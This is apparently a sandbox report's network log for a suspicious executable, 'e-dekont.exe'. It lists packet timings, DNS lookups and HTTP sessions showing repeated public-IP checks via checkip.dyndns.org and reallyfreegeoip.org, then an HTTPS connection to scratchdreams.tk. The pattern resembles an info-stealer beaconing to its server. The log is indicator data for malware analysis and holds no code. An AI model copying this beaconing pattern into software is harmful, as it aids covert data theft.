                                                      Apr 24, 2024 07:09:07.894974947 CEST44349734104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:08.229801893 CEST44349734104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:08.232961893 CEST49734443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:08.244965076 CEST49734443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:08.244991064 CEST44349734104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:08.245368958 CEST44349734104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:08.287621975 CEST49734443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:08.311156034 CEST49734443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:08.352121115 CEST44349734104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:08.847448111 CEST44349734104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:08.847589970 CEST44349734104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:08.847632885 CEST49734443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:08.866211891 CEST49734443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:08.871567011 CEST4973280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:09.037977934 CEST8049732158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:09.041785955 CEST49735443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:09.041887045 CEST44349735104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:09.041963100 CEST49735443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:09.042432070 CEST49735443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:09.042459965 CEST44349735104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:09.084398985 CEST4973280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:09.372801065 CEST44349735104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:09.374727964 CEST49735443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:09.374758959 CEST44349735104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:09.747499943 CEST44349735104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:09.747607946 CEST44349735104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:09.747652054 CEST49735443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:09.748295069 CEST49735443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:09.752094030 CEST4973280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:09.753326893 CEST4973780192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:09.916090012 CEST8049732158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:09.916142941 CEST4973280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:09.917572975 CEST8049737158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:09.917645931 CEST4973780192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:09.917876959 CEST4973780192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:10.082098007 CEST8049737158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:10.082788944 CEST8049737158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:10.084484100 CEST49738443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:10.084511995 CEST44349738104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:10.084623098 CEST49738443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:10.084938049 CEST49738443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:10.084950924 CEST44349738104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:10.131299973 CEST4973780192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:10.413770914 CEST44349738104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:10.415558100 CEST49738443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:10.415592909 CEST44349738104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:10.786665916 CEST44349738104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:10.786839962 CEST44349738104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:10.787632942 CEST49738443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:10.787633896 CEST49738443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:10.791691065 CEST4973780192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:10.792675972 CEST4974080192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:10.956135988 CEST8049737158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:10.956306934 CEST4973780192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:10.956944942 CEST8049740158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:10.959470034 CEST4974080192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:10.959810972 CEST4974080192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:11.124114990 CEST8049740158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:11.125665903 CEST8049740158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:11.127293110 CEST49741443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:11.127391100 CEST44349741104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:11.127475977 CEST49741443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:11.127811909 CEST49741443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:11.127840042 CEST44349741104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:11.178191900 CEST4974080192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:11.455333948 CEST44349741104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:11.457071066 CEST49741443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:11.457154989 CEST44349741104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:11.826581001 CEST44349741104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:11.826668024 CEST44349741104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:11.826756001 CEST49741443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:11.827299118 CEST49741443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:11.833800077 CEST4974080192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:11.835185051 CEST4974280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:11.998984098 CEST8049740158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:11.999138117 CEST8049742158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:11.999167919 CEST4974080192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:11.999222040 CEST4974280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:11.999416113 CEST4974280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:12.164443970 CEST8049742158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:12.165287971 CEST8049742158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:12.167532921 CEST49743443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:12.167609930 CEST44349743104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:12.167697906 CEST49743443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:12.168123007 CEST49743443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:12.168135881 CEST44349743104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:12.209410906 CEST4974280192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:12.497675896 CEST44349743104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:12.499608994 CEST49743443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:12.499692917 CEST44349743104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:12.872498989 CEST44349743104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:12.872689009 CEST44349743104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:12.872860909 CEST49743443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:12.873217106 CEST49743443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:12.877624989 CEST4974480192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:13.042012930 CEST8049744158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:13.042113066 CEST4974480192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:13.042287111 CEST4974480192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:13.206815004 CEST8049744158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:13.208477020 CEST8049744158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:13.210316896 CEST49745443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:13.210386992 CEST44349745104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:13.210639000 CEST49745443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:13.210979939 CEST49745443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:13.210989952 CEST44349745104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:13.256279945 CEST4974480192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:13.539303064 CEST44349745104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:13.540940046 CEST49745443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:13.540977001 CEST44349745104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:13.914659977 CEST44349745104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:13.914787054 CEST44349745104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:13.914876938 CEST49745443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:13.915555000 CEST49745443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:13.920217037 CEST4974480192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:13.921036959 CEST4974680192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:14.084724903 CEST8049744158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:14.084800005 CEST4974480192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:14.085303068 CEST8049746158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:14.085603952 CEST4974680192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:14.085747957 CEST4974680192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:14.250020981 CEST8049746158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:14.252933025 CEST8049746158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:14.254331112 CEST49747443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:14.254371881 CEST44349747104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:14.254473925 CEST49747443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:14.254770041 CEST49747443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:14.254782915 CEST44349747104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:14.303154945 CEST4974680192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:14.584980011 CEST44349747104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:14.586755037 CEST49747443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:14.586780071 CEST44349747104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:14.961443901 CEST44349747104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:14.961637974 CEST44349747104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:14.961741924 CEST49747443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:14.962579012 CEST49747443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:14.966087103 CEST4974680192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:14.967263937 CEST4974880192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:15.130462885 CEST8049746158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:15.130563974 CEST4974680192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:15.131180048 CEST8049748158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:15.131278038 CEST4974880192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:15.131479025 CEST4974880192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:15.297847986 CEST8049748158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:15.298448086 CEST8049748158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:15.299932003 CEST49749443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:15.299978971 CEST44349749104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:15.300173044 CEST49749443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:15.300506115 CEST49749443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:15.300520897 CEST44349749104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:15.350039005 CEST4974880192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:15.632071018 CEST44349749104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:15.633814096 CEST49749443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:15.633832932 CEST44349749104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:16.011205912 CEST44349749104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:16.011432886 CEST44349749104.21.67.152192.168.2.4
                                                      Apr 24, 2024 07:09:16.011579990 CEST49749443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:16.012243986 CEST49749443192.168.2.4104.21.67.152
                                                      Apr 24, 2024 07:09:16.025316000 CEST4974880192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:16.189766884 CEST8049748158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:09:16.189897060 CEST4974880192.168.2.4158.101.44.242
                                                      Apr 24, 2024 07:09:17.850610018 CEST49750443192.168.2.4104.21.27.85
                                                      Apr 24, 2024 07:09:17.850661993 CEST44349750104.21.27.85192.168.2.4
                                                      Apr 24, 2024 07:09:17.850747108 CEST49750443192.168.2.4104.21.27.85
                                                      Apr 24, 2024 07:09:17.851327896 CEST49750443192.168.2.4104.21.27.85
                                                      Apr 24, 2024 07:09:17.851341963 CEST44349750104.21.27.85192.168.2.4
                                                      Apr 24, 2024 07:09:18.190028906 CEST44349750104.21.27.85192.168.2.4
                                                      Apr 24, 2024 07:09:18.190135956 CEST49750443192.168.2.4104.21.27.85
                                                      Apr 24, 2024 07:09:18.192508936 CEST49750443192.168.2.4104.21.27.85
                                                      Apr 24, 2024 07:09:18.192526102 CEST44349750104.21.27.85192.168.2.4
                                                      Apr 24, 2024 07:09:18.192807913 CEST44349750104.21.27.85192.168.2.4
                                                      Apr 24, 2024 07:09:18.194484949 CEST49750443192.168.2.4104.21.27.85
                                                      Apr 24, 2024 07:09:18.240124941 CEST44349750104.21.27.85192.168.2.4
                                                      Apr 24, 2024 07:09:57.839196920 CEST44349750104.21.27.85192.168.2.4
                                                      Apr 24, 2024 07:09:57.839437962 CEST44349750104.21.27.85192.168.2.4
                                                      Apr 24, 2024 07:09:57.839608908 CEST49750443192.168.2.4104.21.27.85
                                                      Apr 24, 2024 07:09:57.852240086 CEST49750443192.168.2.4104.21.27.85
                                                      Apr 24, 2024 07:10:17.164841890 CEST8049742158.101.44.242192.168.2.4
                                                      Apr 24, 2024 07:10:17.164944887 CEST4974280192.168.2.4158.101.44.242

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 24, 2024 07:09:07.018888950 CEST5955153192.168.2.41.1.1.1
                                                      Apr 24, 2024 07:09:07.175024986 CEST53595511.1.1.1192.168.2.4
                                                      Apr 24, 2024 07:09:07.731039047 CEST5854053192.168.2.41.1.1.1
                                                      Apr 24, 2024 07:09:07.885088921 CEST53585401.1.1.1192.168.2.4
                                                      Apr 24, 2024 07:09:16.025978088 CEST5963853192.168.2.41.1.1.1
                                                      Apr 24, 2024 07:09:17.037889957 CEST5963853192.168.2.41.1.1.1
                                                      Apr 24, 2024 07:09:17.849466085 CEST53596381.1.1.1192.168.2.4
                                                      Apr 24, 2024 07:09:17.849488020 CEST53596381.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Apr 24, 2024 07:09:07.018888950 CEST192.168.2.41.1.1.10x733Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:07.731039047 CEST192.168.2.41.1.1.10x77acStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:16.025978088 CEST192.168.2.41.1.1.10xde3fStandard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:17.037889957 CEST192.168.2.41.1.1.10xde3fStandard query (0)scratchdreams.tkA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Apr 24, 2024 07:09:07.175024986 CEST1.1.1.1192.168.2.40x733No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                      Apr 24, 2024 07:09:07.175024986 CEST1.1.1.1192.168.2.40x733No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:07.175024986 CEST1.1.1.1192.168.2.40x733No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:07.175024986 CEST1.1.1.1192.168.2.40x733No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:07.175024986 CEST1.1.1.1192.168.2.40x733No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:07.175024986 CEST1.1.1.1192.168.2.40x733No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:07.885088921 CEST1.1.1.1192.168.2.40x77acNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:07.885088921 CEST1.1.1.1192.168.2.40x77acNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:17.849466085 CEST1.1.1.1192.168.2.40xde3fNo error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:17.849466085 CEST1.1.1.1192.168.2.40xde3fNo error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:17.849488020 CEST1.1.1.1192.168.2.40xde3fNo error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 07:09:17.849488020 CEST1.1.1.1192.168.2.40xde3fNo error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • reallyfreegeoip.org
                                                      • scratchdreams.tk
                                                      • checkip.dyndns.org

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449732158.101.44.242807424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 24, 2024 07:09:07.349437952 CEST151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Apr 24, 2024 07:09:07.515300989 CEST274INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:07 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>
                                                      Apr 24, 2024 07:09:07.519253016 CEST127OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Apr 24, 2024 07:09:07.691046953 CEST274INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:07 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>
                                                      Apr 24, 2024 07:09:08.871567011 CEST127OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Apr 24, 2024 07:09:09.037977934 CEST274INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:08 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449737158.101.44.242807424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 24, 2024 07:09:09.917876959 CEST127OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Apr 24, 2024 07:09:10.082788944 CEST274INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:10 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.449740158.101.44.242807424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 24, 2024 07:09:10.959810972 CEST127OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Apr 24, 2024 07:09:11.125665903 CEST274INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:11 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449742158.101.44.242807424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 24, 2024 07:09:11.999416113 CEST127OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Apr 24, 2024 07:09:12.165287971 CEST274INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:12 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.449744158.101.44.242807424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 24, 2024 07:09:13.042287111 CEST151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Apr 24, 2024 07:09:13.208477020 CEST274INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:13 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.105.36</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.449746158.101.44.242807424C:\Users\user\Desktop\e-dekont.exe
                                                      TimestampBytes transferredDirectionData
                                                      Apr 24, 2024 07:09:14.085747957 CEST151OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                      Host: checkip.dyndns.org
                                                      Connection: Keep-Alive
                                                      Apr 24, 2024 07:09:14.252933025 CEST274INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 05:09:14 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 105
                                                      Connection: keep-alive
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
